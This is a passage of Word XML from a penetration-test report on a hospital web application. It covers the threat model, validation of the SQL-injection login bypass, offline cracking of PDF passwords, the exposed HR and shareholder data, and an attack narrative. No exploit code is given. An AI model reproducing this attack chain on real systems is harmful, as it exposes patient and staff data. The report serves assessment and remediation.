      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Before/after HTTP captures with sensitive tokens redacted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Screenshots showing denied directory and backup access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Authentication regression output.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Authorization matrix for report objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Deployment evidence showing sensitive artifacts are outside the public document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SIEM/detection screenshots showing the expected alerts.</w:t>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Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>13. Threat Model &amp; Abuse Cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The assessment is best understood as an external attacker operating without credentials, relying on publicly reachable HTTP functionality and ordinary tooling. The following abuse cases convert the technical findings into realistic attacker objectives without assuming capabilities that were not demonstrated.</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556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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Abuse case</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Entry condition</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Observed enabler</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Security objective</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Discover restricted application surface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Unauthenticated HTTP access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Directory indexing</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Reduce externally enumerable attack surface</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Acquire internal business records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credentials required</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SQL backup</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Keep sensitive data outside public web root</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Bypass patient authentication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 login endpoint reachable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SQL injection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Preserve authentication invariant</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Retrieve patient documents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Portal session exists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Report download endpoint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Authorize each object server-side</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Recover protected document content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Encrypted PDFs acquired</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Weak passwords + legacy protection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Use modern document protection and strong secrets</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Identify defensive gaps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Verbose errors/fingerprints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SQL warnings + banners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Minimize implementation disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Threat assumptions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attacker has ordinary internet connectivity and can send HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attacker does not begin with a valid patient or staff credential.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attacker does not need social engineering or user interaction for the demonstrated chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Attacker can perform offline analysis once files are legitimately retrieved from the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The assessment does not assume access to the hosting provider control panel or unrelated shared-hosting tenants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>14. SQL Injection Validation Decision Record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A useful professional record should explain not only what succeeded, but also what did not. This prevents tool output from being selectively interpreted and shows how the final conclusion was reached.</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Validation step</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Result</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Interpretation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Normal invalid login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200, no redirect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Baseline established</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Controlled SQL syntax mutation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302 to portal.php</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Manual authentication bypass confirmed</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Browser follow-up</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Authenticated portal displayed</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State change corroborated visually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Burp capture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302 response with Location header</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Independent request/response evidence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sqlmap</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Repeated 403/connection failures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Inconclusive automated validation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Final determination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Confirmed manual SQLi/auth bypass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Manual evidence is authoritative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This decision record is important because a negative automated result does not invalidate a reproducible manual exploit when the automated tool was prevented from receiving stable application responses. At the same time, the report does not claim that sqlmap confirmed the flaw.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>What would constitute a false positive here?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A redirect that occurred for both baseline and malicious requests would not prove authentication bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A portal page that was publicly accessible without a session would not prove a login bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A 302 response without browser confirmation would be weaker evidence because the destination might still enforce authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A scanner-only result without a reproducible request/response pair would not meet the evidence standard used in this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>15. Cryptographic Analysis — What V=2 / R=3 Means</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The PDF artifacts reported version 1.4 and Standard security-handler parameters V=2 and R=3 with 128-bit encryption. These values identify a legacy PDF encryption profile. The assessment does not claim that every document using these parameters is instantly breakable; the observed practical weakness came from the combination of retrievable files, recoverable passwords and the authorized offline cracking workflow.</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Layer</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Observed condition</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Security implication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File format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1.4</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Older document format</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Security handler</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Standard</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Password-based protection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V</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Legacy encryption configuration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Legacy revision associated with 128-bit RC4/AES-era PDF security handling</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Key length</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128-bit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Cryptographic parameter recorded from qpdf</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Password quality</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123456 / password / !@#$%^&amp;</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Weak secrets defeated offline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Application access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Files returned after auth bypass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Primary control failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why offline cracking changes the threat model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>An online login attempt is constrained by server-side controls such as rate limiting, lockout and monitoring. Once an encrypted file is downloaded, password guesses can be made offline without generating additional application requests. That is why document passwords must be strong enough to resist offline guessing and why the application must prevent unauthorized file retrieval in the first place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>16. Network Exposure Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The service scan revealed FTP, SMTP, DNS, POP3/IMAP and cPanel-related services in addition to the web application. A professional report should distinguish “reachable” from “vulnerable.” Reachability establishes attack surface; it does not by itself prove exploitation or misconfiguration.</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Observation class</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What it proves</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What it does not prove</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="357"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Open port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 network service answered the scan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That the service is vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="328"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Service fingerprint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 protocol/software identity was inferred</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That a known CVE is exploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="394"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Direct-IP 403</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Routing differs from hostname path</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That host routing is insecure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="382"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Shared-hosting identity</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Infrastructure appears multi-tenant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That another tenant is reachable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This distinction is particularly important for portfolio work: overclaiming a network-service vulnerability weakens credibility. The report therefore records auxiliary services as attack surface and reserves vulnerability classifications for conditions that were actually demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>17. Data Exposure Quantification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Quantification converts a generic “data leak” statement into a measurable security impact. The captured backup contains 30 staff records and 10 shareholder records. The staff salary field totals ZAR 2,027,000 per month across the 30 records, with a minimum of ZAR 19,000, a maximum of ZAR 160,000 and an average of ZAR 67,566.67.</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Data class</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Observed quantity</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Why it matters</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Employee identity</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30 records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Enables identity correlation and targeted abuse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National identifiers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30 values in source backup</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Sensitive personal identifier exposure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 contact data</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30 email/phone sets in source backup</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Targeting and impersonation risk</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Compensation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30 salary values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Internal HR confidentiality exposure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Shareholders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10 records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Corporate ownership exposure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 reports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 PDFs retrieved</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Sensitive clinical-data exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Data minimization principle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The full raw SQL is retained as evidence because the authorized technical objective required analysis, but the narrative deliberately prefers aggregate statistics. This approach preserves proof while reducing unnecessary repetition of sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>18. Professional Evidence Packaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Evidence quality is part of the security deliverable. The project package uses numbered folders so a reviewer can move from reconnaissance through exploitation, document recovery, database exposure and final reporting without relying on an undocumented personal workstation state.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blHeader w:val="true"/>
        </w:trPr>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Package area</w:t>
            </w:r>
          </w:p>
        </w:tc>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r>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411"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00_Source_Archives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Preserve source material used as the basis for the assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="394"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01_Assignment</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Authorization/scope reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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02_Recon</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DNS/HTTP/application reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="448"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03_Network_Scans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Port and service enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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04_Web_App_Access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Browser/Burp screenshots and web evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="448"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05_SQLi_and_Burp</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Injection and request/response proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="437"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06_Patient_Reports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Retrieved PDF artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="394"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07_PDF_Cracking</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Hashes and password-recovery outputs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="382"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08_Database_Exposure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Captured SQL backup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="449"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09_Reports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Report deliverables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="437"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10_Manifests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Inventory and SHA-256 integrity records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Evidence naming convention</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Screenshot names were normalized from informal filenames into descriptive, numbered names such as 04_SQLi_Auth_Bypass_Response.png and 06_Public_SQL_Backup.png. The goal is to make evidence self-describing and easier to review, archive and reference in future retests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>19. Portfolio Presentation Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The confidential technical report should not be uploaded verbatim to a public portfolio because it contains recovered passwords, patient-report artifacts and personal/corporate records. The project can still be presented strongly by publishing a sanitized case study that retains the attack narrative, sanitized screenshots, severity table, methodology, remediation and evidence methodology while removing credentials and personal identifiers.</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blHeader w:val="true"/>
        </w:trPr>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Portfolio element</w:t>
            </w:r>
          </w:p>
        </w:tc>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Recommended public treatment</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Project title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Independent Web Application Security Assessment &amp; Exploitation Case Study</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Role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Security Researcher / Penetration Tester — Chandrashekar Bala</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Core skills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Web pentesting, SQLi, authentication testing, Burp, Nmap, PDF security, evidence analysis</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Impact statement</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Demonstrated authentication bypass and sensitive-data exposure in an authorized controlled environment</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Evidence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Use sanitized screenshots; redact cookies, identities and credentials</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Code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Show secure remediation examples rather than exploit secrets</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Report</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Publish sanitized PDF; retain confidential evidence privately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Resume-ready project description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Independent Web Application Security Assessment — Conducted an authorized black-box assessment of a hospital web application; identified and manually validated SQL-injection authentication bypass, public database-backup exposure, directory indexing and sensitive patient-report retrieval; analyzed legacy PDF protection and performed authorized offline password recovery; quantified exposed HR/shareholder data; produced evidence-backed CVSS/CWE findings, remediation controls, detection logic and a retest runbook.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>20. Lessons for Secure Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Security controls must be enforced where the sensitive action occurs, not only where the data is stored.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A crawler exclusion is not an authorization boundary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A scanner result is not a substitute for a controlled manual reproduction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Encryption is not a replacement for access control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Error handling is part of the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Deployment hygiene can be as important as application code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A high-quality finding includes a verification condition, not just a recommendation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Evidence preservation increases the credibility and long-term usefulness of a security assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>21. End-to-End Attack Narrative</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This section reconstructs the compromise as an attacker would experience it while preserving the evidence boundary. The purpose is to show how individually small weaknesses compose into a materially larger security outcome.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556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>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Step</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Stage</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Action</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Result</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Reconnaissance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Resolve the hostname, inspect public HTML, robots.txt and sitemap, and enumerate services.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target and restricted application paths identified.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Enumeration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Browse directory indexes.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/old/, /patient/ and /staff/ expose files and endpoint names.</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Independent data exposure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Request the known backup filename.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Internal HR/shareholder database backup retrieved without authentication.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="572" w:hRule="atLeast"/>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Authentication testing</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Send a normal invalid login and capture the baseline.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200 with no portal redirect.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="570" w:hRule="atLeast"/>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SQLi validation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Change only the username to the controlled SQL syntax.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2556" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="20" w:after="40"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:rFonts w:eastAsia="ＭＳ 明朝" w:cs=""/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="ＭＳ 明朝" w:cs=""/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>HTTP 302 redirect to /patient/portal.php.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
